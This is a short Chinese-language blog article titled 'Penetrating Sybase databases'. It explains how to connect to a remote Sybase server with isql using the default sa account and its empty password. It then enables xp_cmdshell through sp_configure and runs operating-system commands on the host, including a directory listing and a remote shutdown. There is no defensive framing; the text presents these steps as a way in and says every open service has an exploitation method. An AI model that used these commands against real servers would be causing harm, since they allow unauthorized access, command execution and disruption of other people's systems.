渗透Sybase数据库

2012-11-11   来源:站长日记       编辑:沧海桑田   类别:数据库    转载到:    发表评论

Sybase提供了一套应用程序编程接口和库,可以与非Sybase数据源及服务器集成,允许在多个数据库之间复制数据,适于创建多层应用。系统具有完备 的触发器、存储过程、规则以及完整性定义,支持优化查询,具有较好的数据安全性。

渗透Sybase数据库
美国Sybase公司研制的关系型数据库系统,是典型的UNIX或WindowsNT平台上客户机/服务器环境下的大型数据库系统。
首先连接Sybase数据库,
使用Sybase Central Java Edition,
也可以使用Sybase自带的isql(路径为sybaseOCS-12_5bin)

isql的使用方法
isql -H(远程主机IP地址) -U(账号) -P(密码)  -J(防止不同字符类型引起的出错提示,可去掉)
Sybase的默认开放端口为5000,并支持XP_CMDSHELL,会给远程执行命令提供了条件。

xp_cmdshell "命令名"
xp_cmdshell "dir c:"。
因为SYBASE默认不允许使用XP_CMDSHELL,出错提示:
User access denied. Not a member of NT administrators group.
与MSSQL SEVER2005相同,与MSSQL SEVER2005不同的是Sybase数据库在安装时默认账号为sa,密码为空,并不提示用户修改密码,很危险,

可以远程设置XP_CMDSHELL为启用,语句如下引用:
sp_configure "xp_cmdshell context",0
go

然后 比如远程关机
xp_cmdshell "shutdown r"
go

任何一种开放的服务(端口),任何一种服务,都有利用方法,
比如SQLSever,MySQL,Oracle,Access

14

2
14|2 | 鲜花 VS 砸蛋 | 95阅读 0评论
 
不想登录?直接点击发布即可作为游客留言。
昵称  邮箱 网站 验证码 = 1+1